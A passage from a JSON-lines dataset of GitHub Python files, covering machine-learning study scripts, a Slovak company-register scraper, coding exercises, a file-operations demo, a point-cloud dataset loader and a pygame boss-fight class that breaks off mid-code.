inspect.getmodule(node).__name__\n all_sub_modules = [n for n in module_tree.split('.')\n if n not in ('interfaces', 'nipype')]\n return all_sub_modules\n\n\ndef pyfunc2json():\n \"\"\" Experimental function to convert Python functions\n directly to Porcupine's JSON format (by converting it)\n first to a Nipype node. \"\"\"\n pass\n","repo_name":"spisakt/PUMI","sub_path":"porcupine/nipype2json.py","file_name":"nipype2json.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"38427173156","text":"from sklearn import datasets\n\nd = datasets.load_iris()\n\nprint(d.DESCR)\n\nfor i in range(0,len(d.data)):\n print(i+1,d.data[i],d.target[i])\n\nfrom sklearn import svm\ns = svm.SVC(gamma=0.1,C=10)\ns.fit(d.data,d.target)\n\nnew_d = [[6.4,3.2,6.0,2.5],[7.3,3.1,4.2,1.35]]\n\nres=s.predict(new_d)\nprint('새로운 2개 생물의 분류',res)\n\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\n\ndigit = datasets.load_digits()\n\nplt.figure(figsize = (5,5))\nplt.imshow(digit.images[0],cmap=plt.cm.gray_r,interpolation='nearest')\nplt.show()\nprint(digit.data[0])\nprint('이 숫자는',digit.target[0],'입니다')\n\nfrom sklearn import datasets\nfrom sklearn import svm\n\ndigit=datasets.load_digits()\n\ns=svm.SVC(gamma=0.1,C=10)\ns.fit(digit.data,digit.target)\n\nnew_d=[digit.data[0],digit.data[1],digit.data[2]]\nres=s.predict(new_d)\nprint('예측값은',res)\nprint('참값은',digit.target[0],digit.target[1],digit.target[2])\n\nres=s.predict(digit.data)\ncorrect=[i for i in range(len(res)) if res[i]==digit.target[i]]\naccuracy=len(correct)/len(res)\nprint('화소 특징을 사용했을 때 정확률=',accuracy*100,\"%\")","repo_name":"cherish10/Python","sub_path":"study/exam/2021_02_19.py","file_name":"2021_02_19.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16642226869","text":"from lxml import etree\nimport requests\n\n__version__ = '1.0'\n__author__ = 'Richard Mihalovic'\n__contact__ = 'richard@mihalovic.sk'\n__licence__ = 'MIT'\n\n\nclass OrSr:\n def __load_html(self, url):\n r = requests.get(url)\n r.encoding = 'windows-1250'\n html = r.text\n 
r.connection.close() # fix: ResourceWarning: unclosed\n\n return html\n\n def hladaj_podla_ico(self, ico):\n url = 'http://orsr.sk/hladaj_ico.asp?SID=0&ICO=' + ico.replace(' ', '')\n html = self.__load_html(url)\n\n root = etree.fromstring(html, etree.HTMLParser())\n elements = root.xpath('//div[@class=\"bmk\"][1]/a/@href')\n if len(elements) > 1:\n detail_url = 'http://orsr.sk/' + elements[0]\n detail_html = self.__load_html(detail_url)\n return OrSrDetailParser().parse(detail_html)\n else:\n return None\n\n def hladaj_podla_nazvu(self, nazov):\n url = 'http://orsr.sk/hladaj_subjekt.asp?PF=0&SID=0&R=on&OBMENO=' + nazov\n html = self.__load_html(url)\n\n root = etree.fromstring(html, etree.HTMLParser())\n elements = root.xpath('//div[@class=\"bmk\"][1]/a/@href')\n if len(elements) > 1:\n detail_url = 'http://orsr.sk/' + elements[0]\n detail_html = self.__load_html(detail_url)\n return OrSrDetailParser().parse(detail_html)\n else:\n return None\n\n\nclass OrSrDetailParser(object):\n def __init__(self):\n self.__detail = {\n 'nazov': '',\n 'sidlo': '',\n 'ico': '',\n 'den_zapisu': '',\n 'pravna_forma': '',\n 'predmet_cinnosti': [],\n 'spolocnici': [],\n 'statutarny_organ': [],\n 'dozorna_rada': ''\n }\n\n def parse(self, html):\n parser = etree.HTMLParser()\n root = etree.fromstring(html, parser)\n tables = root.xpath('/html/body/table')\n\n tmp_name = ''\n for table in tables:\n typ = self.__zisti_typ_zaznamu(table).lower().replace(':', '')\n\n if typ == 'obchodné meno' or typ == 'obchodné meno organizačnej zložky':\n self.__nacitaj_nazov_spolocnosti(table)\n elif typ == 'sídlo' or typ == 'sídlo organizačnej zložky' or typ == \"miesto podnikania\":\n self.__nacitaj_sidlo_spolocnosti(table)\n elif typ == 'ičo':\n self.__nacitaj_ico(table)\n elif typ == 'deň zápisu':\n self.__nacitaj_den_zapisu(table)\n elif typ == 'právna forma':\n self.__nacitaj_pravnu_formu(table)\n elif typ == 'predmet činnosti':\n self.__nacitaj_predmet_cinnosti(table)\n elif typ == 'spoločníci':\n self.__nacitaj_spolocnikov(table)\n elif typ == 'výška vkladu každého spoločníka':\n self.__nacitaj_vklady(table)\n elif typ == 'štatutárny orgán':\n self.__nacitaj_statutarny_organ(table)\n elif typ == 'dozorná rada':\n self.__nacitaj_dozornu_radu(table)\n elif typ == 'údaje o podnikateľovi' or typ == 'bydlisko':\n tmp_name += self.__process_udaje_o_podnikatelovi(table, typ)\n\n if tmp_name != '':\n self.__detail['spolocnici'].append(tmp_name.strip())\n self.__detail['statutarny_organ'].append(tmp_name.strip())\n\n return self.__detail\n\n def __zisti_typ_zaznamu(self, table):\n record_type = table.xpath('tr/td[1]/span/text()')\n record_type = ' '.join(record_type)\n record_type = record_type.strip().replace(':', '')\n return record_type\n\n def __nacitaj_nazov_spolocnosti(self, table): # nazov\n elements = table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')\n self.__detail['nazov'] = ''.join(elements).strip()\n\n def __nacitaj_sidlo_spolocnosti(self, table): # sidlo\n spans = table.xpath('tr/td[2]//span')\n\n address = ''\n if len(spans) >= 4:\n address = spans[0].text.strip() + ' ' + spans[1].text.strip() + ', '\n address += spans[2].text.strip() + ', '\n address += spans[3].text.strip()\n\n pos = address.find(', (od:')\n if pos != -1:\n address = address[0:pos]\n else:\n # TODO\n #address = tds[0].get_text()\n pass\n\n self.__detail['sidlo'] = address.strip()\n\n def __nacitaj_ico(self, table): # ico\n ico = ''.join(table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')).strip()\n self.__detail['ico'] = ico\n\n def 
__nacitaj_den_zapisu(self, table): # den zapisu\n den_zapisu = ''.join(table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')).strip()\n self.__detail['den_zapisu'] = den_zapisu\n\n def __nacitaj_pravnu_formu(self, table): # pravna forma\n pravna_forma = ''.join(table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')).strip()\n self.__detail['pravna_forma'] = pravna_forma\n\n def __nacitaj_predmet_cinnosti(self, table): # predmet cinnosti\n elements = (table.xpath('tr/td[2]/table/tr/td[1]/span[1]'))\n self.__detail['predmet_cinnosti'] = [e.text.strip() for e in elements]\n\n def __nacitaj_spolocnikov(self, table): # spolocnici\n spolocnici = []\n\n tds = table.xpath('tr/td[2]/table/tr/td[1]')\n for td in tds:\n elements = td.xpath('child::span | child::br | child::a/span')\n\n br = 0\n meno = ''\n adresa_l = []\n for e in elements:\n if e.tag == 'br':\n br += 1\n\n if 'span' and br == 0:\n meno += e.text.strip() + ' '\n elif e.tag == 'span' and br > 0:\n adresa_l.append(e.text.strip())\n\n adresa = ''\n if br == 3:\n if len(adresa_l) == 3:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + adresa_l[2]\n elif len(adresa_l) == 4:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + ', '.join(adresa_l[2:])\n\n spolocnici.append(meno + '( ' + adresa + ' )')\n elif br > 3:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + ', '.join(adresa_l[2:])\n spolocnici.append(meno + '( ' + adresa + ' )')\n\n self.__detail['spolocnici'] = spolocnici\n\n def __nacitaj_vklady(self, table): # vklady\n vklady = []\n self.__detail['vklady'] = vklady\n\n def __nacitaj_statutarny_organ(self, table): # statutarny organ\n statutarny_organ = []\n\n elements = table.xpath('tr/td[2]/table/tr/td[1]//span | tr/td[2]/table/tr/td[1]//br')\n\n statutarny_organ.append(elements.pop(0).text.strip())\n\n br_counter = 0\n meno_tmp = []\n adresa_tmp = []\n for e in elements:\n if e.tag == 'br':\n br_counter += 1\n else:\n text = e.text.strip()\n\n if 'Vznik funkcie' in text:\n adresa = ' '.join(adresa_tmp[:2]) + ', '\n adresa += ', '.join(adresa_tmp[2:])\n item = ' '.join(meno_tmp) + ' ( ' + adresa + ' )'\n statutarny_organ.append(item)\n\n br_counter = 0\n meno_tmp = []\n adresa_tmp = []\n elif br_counter == 1:\n meno_tmp.append(e.text.strip())\n elif 'pobyt na území SR' not in text:\n adresa_tmp.append(e.text.strip())\n\n self.__detail['statutarny_organ'] = statutarny_organ\n\n def __nacitaj_dozornu_radu(self, table):\n dozorna_rada = []\n\n elements = table.xpath('tr/td[2]/table/tr/td[1]//span | tr/td[2]/table/tr/td[1]//br')\n br = 0\n meno = ''\n adresa_l = []\n process_record = False\n for e in elements:\n if e.tag == 'br':\n br += 1\n\n if e.tag == 'span' and 'Vznik funkcie' in e.text:\n process_record = True\n elif process_record and br == 1:\n br = 0\n process_record = False\n elif e.tag == 'span' and br == 0:\n meno += e.text.strip() + ' '\n elif e.tag == 'span' and br > 0:\n text = e.text.strip()\n if 'pobyt na území SR' not in text and 'Vznik funkcie' not in text:\n adresa_l.append(text)\n\n adresa = ''\n if process_record:\n if len(adresa_l) == 3:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + adresa_l[2]\n elif len(adresa_l) == 4:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + ', '.join(adresa_l[2:])\n else:\n adresa = ', '.join(adresa_l)\n\n dozorna_rada.append(meno + '( ' + adresa + ' )')\n\n br = 0\n meno = ''\n adresa_l = []\n\n self.__detail['dozorna_rada'] = dozorna_rada\n\n def __process_udaje_o_podnikatelovi(self, table, which):\n l = []\n elements = 
table.xpath('tr/td[2]/table/tr/td[1]/span/text()')\n for e in elements:\n if 'od:' not in e:\n l.append(e.strip())\n\n if which == 'bydlisko':\n txt = '( ' + ' '.join(l) + ' )'\n else:\n txt = ' '.join(l) + ' '\n\n return txt\n","repo_name":"richard-mihalovic/py-orsr","sub_path":"orsr.py","file_name":"orsr.py","file_ext":"py","file_size_in_byte":9478,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"50"} +{"seq_id":"23309636739","text":"def page_digits(pages):\n #Sort it for those that can't go len-2\n if pages < 10: \n x = (range(1, pages + 1))\n list_for_length = []\n for i in x: \n i = str(i)\n list_for_length.append(len(i))\n return sum(list_for_length)\n # and everyone else!\n else: \n y = ''\n length = len(str(pages))\n l = '9' * (length - 1)\n y = str(length - 2) + ('8' * (length-2)) + '9'\n y = int(y)\n y = y + (((pages - int(l)) * length))\n return y \n\n\n ","repo_name":"gordonbowe18/code_wars","sub_path":"count_page_numbers/answer/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"79372437","text":"def countInv(arr):\n # exit condition for recursion\n if len(arr)<=1:\n return 0\n mid = len(arr)//2\n leftarr=arr[:mid]\n rightarr=arr[mid:]\n lefinv = countInv(leftarr)\n rightinv = countInv(rightarr)\n i=0\n j=0\n k=0\n invcount=0\n while i fully connected layer; activation function take a linear model (1 degree) and make it polynomial (more than 1 degree)\r\n keras.layers.Dense(10, activation=\"softmax\") #output layer\r\n])\r\n\r\nmodel.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"]) #loss functions minimize the functions in order to not make it too difficult to work with\r\n\r\nmodel.fit(train_images, train_labels, epochs=5) #here we train the model\r\n\r\nprediction = model.predict(test_images)\r\nfor i in range(45,50):\r\n plt.grid(False)\r\n plt.imshow(test_images[i], cmap=plt.cm.binary)\r\n plt.xlabel(\"Actual:\"+ class_names[test_labels[i]])\r\n plt.title(\"Prediction:\"+ class_names[np.argmax(prediction[i])]) #show the neuron which the highest value in terms of being certain that is true\r\n plt.show()\r\n","repo_name":"hasanarcas/Python-AI","sub_path":"Neural Networks/Clothes classification/Clothes Classification.py","file_name":"Clothes Classification.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31760441245","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport shutil\nimport time\n\nprint(os.name)\nprint(os.uname())\nprint(os.environ)\n\nprint(os.environ.get('PATH'))\nprint(os.environ.get('x', 'default'))\nprint(os.environ.get('PYTHONPATH'))\n\nprint('\\n---- Path ----')\nprint(os.path.abspath('.'))\nprint(os.path.join('~', 'test-dir'))\npath = os.path.join(os.path.abspath('.'), 'test-dir')\nos.mkdir(path)\nos.rmdir(path)\n\nprint(path)\nprint(os.path.split(path))\n\npath = os.path.join(os.path.abspath('.'), 'python.png')\nprint(path)\nprint(os.path.splitext(path))\n\n\nprint('\\n---- File ----')\nfile_name = 'test.txt'\nif not os.path.exists(os.path.join(os.path.abspath('.'), file_name)):\n with open(file_name, 'x') as file:\n pass\n\nfile_rename = 'test.py'\nos.rename(file_name, file_rename)\nos.remove(file_rename)\n\n\nprint('\\n---- Copy File ----')\npath = os.path.abspath('.')\nparent_path = 
os.path.abspath('..')\nfile_name = 'README.md'\nif os.path.exists(os.path.join(parent_path, file_name)):\n shutil.copyfile(os.path.join(parent_path, file_name), os.path.join(path, file_name))\n input('Can you see a duplicated %s?\\nAny key to remove it.' % file_name)\n os.remove(os.path.join(path, file_name))\n\n\nprint('\\n---- Use copyfile() for directory ----')\ndirectory_name = 'UnitTest'\nif os.path.exists(os.path.join(parent_path, directory_name)):\n try:\n shutil.copyfile(os.path.join(parent_path, directory_name), os.path.join(path, directory_name))\n input('Can you see a duplicated directory named %s?\\nAny key to remove' % directory_name)\n os.remove(os.path.join(path, directory_name))\n except IsADirectoryError as an_error:\n print(an_error)\n print('copyfile() can not respond to directory')\n\n\nprint('\\n---- Use copy() for directory')\nsrc = os.path.join(parent_path, directory_name)\ndst = os.path.join(path, directory_name)\nif os.path.exists(src):\n try:\n shutil.copy(src, dst)\n input('Can you see a duplicated directory named %s?\\nAny key to remove' % directory_name)\n os.remove(dst)\n except IsADirectoryError as an_error:\n print(an_error)\n print('copy() can not respond to directory')\n\n\nprint('\\n---- Use copytree() for directory')\nsrc = os.path.join(parent_path, directory_name)\ndst = os.path.join(path, directory_name)\nif os.path.exists(dst):\n shutil.rmtree(dst)\nif os.path.exists(src):\n try:\n shutil.copytree(src, dst)\n input('Can you see a duplicated directory named %s?\\nAny key to remove' % directory_name)\n os.removedirs(dst)\n except IsADirectoryError as an_error:\n print(an_error)\n print('copytree() can not respond to directory')\n except OSError as an_error:\n print(an_error)\n print('os.remove() or os.removedirs() are not the key func, let us try the shutil.rmtree()')\n shutil.rmtree(dst)\n\n\nprint('\\n---- List ----')\ndirectory_name = os.path.expanduser('~')\nprint(os.listdir(directory_name))\nprint('---- After filtration ----')\ndirs = [x for x in os.listdir(directory_name) if os.path.isdir(os.path.join(directory_name, x))]\nprint(dirs)\ndirs = [x for x in os.listdir(directory_name) if '.' in os.path.join(directory_name, x)]\nprint(dirs)\n","repo_name":"stonewin540/python.python3-hello-world","sub_path":"IO/file-operations.py","file_name":"file-operations.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34319505462","text":"import os\nimport torch\nimport numpy as np\nimport open3d as o3d\nimport torch.utils.data as data\nfrom scipy.spatial.transform import Rotation as R\nimport open3d as o3d\n\n\ndef jitter_point_cloud(batch_data, sigma=0.01, clip=0.0225):\n \"\"\" Randomly jitter points. 
jittering is per point.\n Input:\n BxNx3 array, original batch of point clouds\n Return:\n BxNx3 array, jittered batch of point clouds\n \"\"\"\n B, N, C = batch_data.shape\n assert(clip > 0)\n jittered_data = np.clip(sigma * np.random.randn(B, N, C), -1*clip, clip)\n jittered_data += batch_data\n return jittered_data\n\ndef farthest_point_sampling(points, num_samples):\n num_points = points.shape[0]\n sampled_indices = np.zeros(num_samples, dtype=np.int32)\n distances = np.full(num_points, np.inf)\n\n # 随机选择一个起始点\n start_index = 0\n sampled_indices[0] = start_index\n\n for i in range(1, num_samples):\n last_sampled_index = sampled_indices[i - 1]\n last_sampled_point = points[last_sampled_index]\n\n # 计算每个点到最后一个采样点的距离\n dist_to_last_sampled = np.linalg.norm(points - last_sampled_point, axis=1)\n\n # 更新距离数组,保留最小距离\n distances = np.minimum(distances, dist_to_last_sampled)\n\n # 选择最远的点作为下一个采样点\n next_sampled_index = np.argmax(distances)\n sampled_indices[i] = next_sampled_index\n\n return points[sampled_indices]\n\ndef pc_normalize(pc):\n centroid = np.mean(pc, axis=0)\n pc = pc - centroid\n m = np.max(np.sqrt(np.sum(pc**2, axis=1)))\n pc = pc / m\n return pc\n\nclass ToolsDataset(data.Dataset):\n def __init__(self, args):\n super(ToolsDataset, self).__init__()\n\n self.input_num = args.input_num\n self.args = args\n # input and gt: (b, n, 3) radius: (b, 1)\n self.datas = []\n self.names = []\n print('Loading and processing point cloud, waiting ...')\n tmp_datas = []\n tmp_names = []\n print('args.file_path',args.file_path)\n load_data_path = os.path.join(args.file_path,'pc_{}pts.npz'.format(self.input_num))\n print('load_data_path',load_data_path)\n if os.path.exists(load_data_path): # 加载已有数据\n tdatas = np.load(load_data_path,allow_pickle=True)['data']\n tnames = np.load(load_data_path,allow_pickle=True)['name']\n for iii in range(len(tdatas)):\n tmp_datas.append(tdatas[iii])\n tmp_names.append(str(tnames[iii]))\n\n for root, dirs, files in os.walk(args.file_path):\n for file in files:\n if file.endswith('pcd'):\n tmp_name = os.path.join(root,file)\n\n if tmp_name in tmp_names:\n self.datas.append(tmp_datas[tmp_names.index(tmp_name)])\n self.names.append(tmp_name)\n continue\n\n pcd=o3d.io.read_point_cloud(tmp_name)#路径需要根据实际情况设置\n input=np.asarray(pcd.points)#A已经变成n*3的矩阵\n\n lens = len(input)\n\n if lens < self.input_num :\n ratio = int(self.input_num /lens + 1)\n tmp_input = np.tile(input, (ratio, 1))\n input = tmp_input[:self.input_num]\n\n if lens > self.input_num:\n # np.random.shuffle(input) # 每次取不一样的1024个点\n input = farthest_point_sampling(input, self.input_num)\n\n self.datas.append(input)\n self.names.append(tmp_name)\n\n np.savez(load_data_path,data=self.datas,name=self.names)\n print('data lens: ',len(self.datas))\n\n # 计算相似度\n load_data_sim_path = os.path.join(args.file_path,'pc_{}pts_sim.npz'.format(self.input_num))\n tmpex_name,tmpex_sim = [],[]\n if os.path.exists(load_data_sim_path): # 加载已有数据\n tmpex_sim = np.load(load_data_sim_path,allow_pickle=True)['sim']\n tmpex_name = np.load(load_data_sim_path,allow_pickle=True)['name']\n is_calc_sim = False\n if len(tmpex_name) != len(self.names):\n is_calc_sim = True\n else:\n for ii in range(len(self.names)):\n if self.names[ii]!=str(tmpex_name[ii]):\n is_calc_sim = True\n break\n self.sim = tmpex_sim\n if is_calc_sim:\n l = len(self.datas)\n self.sim = np.zeros((l,l))\n print('please wait, calculating point cloud similarity ... 
')\n for i in range(l): # 两个for循环可能有点慢\n for j in range(i+1,l):\n point_cloud1 = o3d.geometry.PointCloud()\n point_cloud1.points = o3d.utility.Vector3dVector(pc_normalize(self.datas[i])) # 示例点云1\n point_cloud2 = o3d.geometry.PointCloud()\n point_cloud2.points = o3d.utility.Vector3dVector(pc_normalize(self.datas[j]))\n mean_distance_t_s = np.mean(point_cloud1.compute_point_cloud_distance(point_cloud2)) # 倒角距离,值越小越相似\n self.sim[i,j] = mean_distance_t_s\n self.sim[j,i] = mean_distance_t_s\n np.savez(load_data_sim_path,sim=self.sim,name=self.names)\n print('finished calculatpoint cloud similarity ')\n\n def __len__(self):\n return len(self.datas)\n\n def __getitem__(self, index):\n # (n, 3)\n input = self.datas[index]\n # pcd=o3d.io.read_point_cloud(input)#路径需要根据实际情况设置\n # input=np.asarray(pcd.points)#A已经变成n*3的矩阵\n if np.random.rand() >= 0.5: # 1是正样本对\n label = 1\n else:\n label = 0\n\n input1 = input\n if label == 1: # 正样本对\n msg = '哈哈正样本'\n input2 = jitter_point_cloud(input[None,...]).squeeze()\n else: # 负样本对\n if np.random.rand() >= 0.5: # 生成旋转的负样本对\n # 生成一个随机旋转矩阵\n random_rotation = R.random()\n # 获取旋转矩阵的矩阵表示\n rotation_matrix = random_rotation.as_matrix()\n # 将点云中的每个点应用旋转\n input2 = np.dot(rotation_matrix, input.T).T\n msg = '旋转负样本'\n else: # 和其他样本生成负样本对\n sim = self.sim[index]\n min_idx = np.argsort(sim)\n neg_id = np.random.choice(min_idx[-100:])\n input2 = self.datas[neg_id]\n msg = '其他负样本'\n\n input1 = pc_normalize(input1)\n input1 = torch.from_numpy(input1)\n input2 = pc_normalize(input2)\n input2 = torch.from_numpy(input2)\n\n return input1,input2,label,msg","repo_name":"LJJ1799/matching_client","sub_path":"pointnet2/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40156705965","text":"import pygame\nimport random\nfrom .settings import *\nfrom .collisions import *\nfrom .spritesheets import *\n\nboss_hand_spritesheet = spritesheet(\"assets/boss/arm_projectile_glowing.png\")\nhand_attack_animations = \\\n\tboss_hand_spritesheet.load_strip((0, 0, 100, 100), 3, (0, 0, 0)) + boss_hand_spritesheet.load_strip((0, 100, 100, 100), 3, (0, 0, 0))\n\nhand_attack_animations = [scale_image(img, 0.5) for img in hand_attack_animations]\n\nclass BaseAttackHand:\n\tdef __init__(self, gaurdian_rect, facing_right):\n\t\tself.rect = gaurdian_rect.copy()\n\t\tself.speed = 12 if facing_right else -12\n\t\tself.current_frame = 0\n\t\tself.image = hand_attack_animations[self.current_frame]\n\t\tself.state = 0\n\t\n\tdef update(self):\n\t\tself.current_frame += 0.2\n\t\tif int(self.current_frame) > len(hand_attack_animations) - 1:\n\t\t\tself.current_frame = 0\n\t\tself.image = hand_attack_animations[int(self.current_frame)]\n\n\t\tif self.state == 0:\n\t\t\tself.rect.x += self.speed\n\t\t\tif self.rect.centerx < 0 or self.rect.centerx > SCALE_WIDTH:\n\t\t\t\tself.state = 2 \n\t\t\t\tself.rect.x += self.speed * 30\n\t\t\t\tself.speed = -self.speed * 1.8\n\t\t\t\tself.rect.y = random.randint(SCALE_HEIGHT - 95, SCALE_HEIGHT - 40)\n\t\telse:\n\t\t\tself.rect.x += self.speed\n\t\t\tif self.speed > 0 and self.rect.centerx > SCALE_WIDTH + 50:\n\t\t\t\tself.state = \"done\"\n\t\t\telif self.speed < 0 and self.rect.centerx < -50:\n\t\t\t\tself.state = \"done\"\n\t\n\tdef render(self, screen):\n\t\timage = self.image\n\t\tif self.speed < 5:\n\t\t\timage = pygame.transform.flip(self.image, True, False)\n\t\tscreen.blit(image, (self.rect.centerx - self.image.get_width()/2, 
self.rect.centery - self.image.get_height()/2))\n\nboss_spritesheet = spritesheet(\"assets/boss/spritesheet.png\")\n\nIDLE = \"idle\"\nBASE_ATTACK = \"base_attack\"\nSUPER_SMASH = \"super_smash\"\nHELL_FIRE = \"hell_fire\"\nTARGET_SHURIKEN = 3\nBLAST_SHURIKEN = 4\nCOOLDOWN = \"cooldown\"\n\nanimations = {\n\t\"idle\": boss_spritesheet.load_strip((0, 0, 100, 100), 4, (0, 0, 0)),\n\t\"base_attack\": boss_spritesheet.load_strip((0, 200, 100, 100), 9, (0, 0, 0)),\n\t\"super_smash\": boss_spritesheet.load_strip((0, 300, 100, 100), 8, (0, 0, 0)),\n\t\"hell_fire\": boss_spritesheet.load_strip((0, 500, 100, 100), 6, (0, 0, 0)),\n\t\"cooldown\": boss_spritesheet.load_strip((0, 600, 100, 100), 10, (0, 0, 0))\n}\n\nATTACK_STAGES = {\n\t\"1\": [BASE_ATTACK, BASE_ATTACK, BASE_ATTACK, SUPER_SMASH],\n\t\"2\": [BASE_ATTACK, SUPER_SMASH, HELL_FIRE],\n\t\"3\": [SUPER_SMASH, HELL_FIRE, TARGET_SHURIKEN, BLAST_SHURIKEN],\n}\n\nanimations[\"idle\"] = [scale_image(img, 0.5) for img in animations[\"idle\"]]\nanimations[\"base_attack\"] = [scale_image(img, 0.5) for img in animations[\"base_attack\"]]\nanimations[\"super_smash\"] = [scale_image(img, 0.5) for img in animations[\"super_smash\"]]\nanimations[\"hell_fire\"] = [scale_image(img, 0.5) for img in animations[\"hell_fire\"]]\nanimations[\"cooldown\"] = [scale_image(img, 0.5) for img in animations[\"cooldown\"]]\n\nclass Boss:\n\tdef __init__(self, player, borders):\n\t\tself.player = player\n\t\tself.rect = pygame.Rect(SCALE_WIDTH/2 + 45, -50, 50, 50)\n\t\tself.borders = borders\n\t\tself.entered = False\n\t\tself.stage = 1\n\n\t\tself.state = IDLE\n\t\tself.action = animations[self.state]\n\t\tself.current_frame = 0\n\t\tself.image = self.action[self.current_frame]\n\t\tself.facing_right = False\n\t\tself.entered_time = 0\n\t\tself.message = None\n\t\tself.attacking = False\n\t\tself.done_attack = False\n\t\tself.attack_hand= None\n\t\tself.idle_move = False\n\t\tself.idle_new_x = 0\n\t\tself.last_walked = 0\n\t\tself.walk_wait_times = 200\n\t\tself.times_to_attack = 8\n\t\tself.smash_times = random.randint(8, 18)\n\t\tself.smashed_times = 0\n\t\tself.start_y = 50\n\t\tself.moving_to_cooldown = False\n\t\tself.cooling_down = False\n\t\tself.moving_back = False\n\t\tself.cooling_down_start = 0\n\t\tself.low_y = SCALE_HEIGHT - 100\n\t\tself.bombs = 0\n\t\t# [loc, velocity, timer]\n\t\tself.particles = []\n\n\t\tself.max_health = 1000\n\t\tself.health = self.max_health\n\t\tself.health_bar_length = SCALE_WIDTH / 2\n\t\tself.health_ratio = self.max_health / self.health_bar_length\n\t\n\tdef update(self):\n\t\tself.action = animations[self.state]\n\t\tif self.moving_to_cooldown or self.cooling_down or self.moving_back:\n\t\t\tif self.moving_to_cooldown:\n\t\t\t\tif self.rect.y < self.low_y:\n\t\t\t\t\tself.rect.y += 3\n\t\t\t\t\tif abs(self.rect.y - self.low_y) < 10:\n\t\t\t\t\t\tself.rect.y = self.low_y\n\t\t\t\t\t\tself.moving_to_cooldown = False\n\t\t\t\t\t\tself.cooling_down = True\n\t\t\t\t\t\tself.cooling_down_start = pygame.time.get_ticks()\n\t\t\telif self.cooling_down:\n\t\t\t\tif pygame.time.get_ticks() - self.cooling_down_start > 4000:\n\t\t\t\t\tself.cooling_down = False\n\t\t\t\t\tself.moving_to_cooldown = False\n\t\t\t\t\tself.moving_back = True\n\t\t\t\t\tself.state = IDLE\n\t\t\telif self.moving_back:\n\t\t\t\tif self.rect.y > self.start_y:\n\t\t\t\t\tself.rect.y -= 3\n\t\t\t\t\tif abs(self.rect.y - self.start_y) < 10:\n\t\t\t\t\t\tself.rect.y = self.start_y\n\t\t\t\t\t\tself.moving_to_cooldown = False\n\t\t\t\t\t\tself.moving_back = 
False\n\t\t\tself.current_frame += 0.2\n\t\t\tif int(self.current_frame) > len(self.action) - 1:\n\t\t\t\tself.current_frame = 0\n\t\telif self.attacking:\n\t\t\tif self.state == BASE_ATTACK:\n\t\t\t\tself.current_frame += 0.6\n\t\t\t\tif int(self.current_frame) > len(self.action) - 1:\n\t\t\t\t\tself.done_attack = True\n\t\t\t\t\tself.current_frame = len(self.action) - 1\n\t\t\t\telif int(self.current_frame) > len(self.action) - 2 and self.attack_hand is None:\n\t\t\t\t\tself.attack_hand = BaseAttackHand(self.rect, self.facing_right)\n\t\t\t\t\tself.attacking = False\n\t\t\t\t\tself.times_to_attack -= 1\n\t\t\telif self.state == SUPER_SMASH:\n\t\t\t\tif int(self.current_frame) < len(self.action) - 1 and not self.smashed_times >= self.smash_times:\n\t\t\t\t\tself.current_frame += 0.2\n\t\t\t\telif self.smashed_times >= self.smash_times:\n\t\t\t\t\tif self.rect.y < self.start_y:\n\t\t\t\t\t\tself.rect.y += 25 * 0.15\n\t\t\t\t\t\tif self.current_frame > 0:\n\t\t\t\t\t\t\tself.current_frame -= 0.2\n\t\t\t\t\t\t\n\t\t\t\t\t\tif abs(self.rect.y - self.start_y) < 5:\n\t\t\t\t\t\t\tself.rect.y = self.start_y\n\t\t\t\t\t\t\tself.state = IDLE\n\t\t\t\t\t\t\tself.times_to_attack -= 1\n\t\t\t\t\t\t\tself.attacking = False\n\t\t\t\telse:\n\t\t\t\t\tself.rect.y += 28\n\t\t\t\t\tif self.rect.y > SCALE_HEIGHT + 100:\n\t\t\t\t\t\tself.rect.y = - 100\n\t\t\t\t\t\tself.rect.centerx = self.player.rect.centerx\n\t\t\t\t\t\tself.smashed_times += 1\n\t\t\t\t\t\tif self.smashed_times >= self.smash_times:\n\t\t\t\t\t\t\tself.rect.centerx = SCALE_WIDTH / 2\n\t\t\telif self.state == HELL_FIRE:\n\t\t\t\tif int(self.current_frame) < len(self.action) - 1:\n\t\t\t\t\tself.current_frame += 0.2\n\t\t\t\t\n\t\t\t\tif len(self.particles) < 150 and self.bombs <= 250 and random.randint(0, 50) > 20:\n\t\t\t\t\tself.bombs += 1\n\t\t\t\t\tself.particles.append(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\tself.rect.centerx,\n\t\t\t\t\t\t\t\tself.rect.centery + 20\n\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t[random.randint(0, 20) / 10 - 1, -5],\n\t\t\t\t\t\t\trandom.randint(6, 10),\n\t\t\t\t\t\t\trandom.randint(-15, 15),\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\t\tif self.bombs >= 250 and len(self.particles) == 0:\n\t\t\t\t\tself.state = 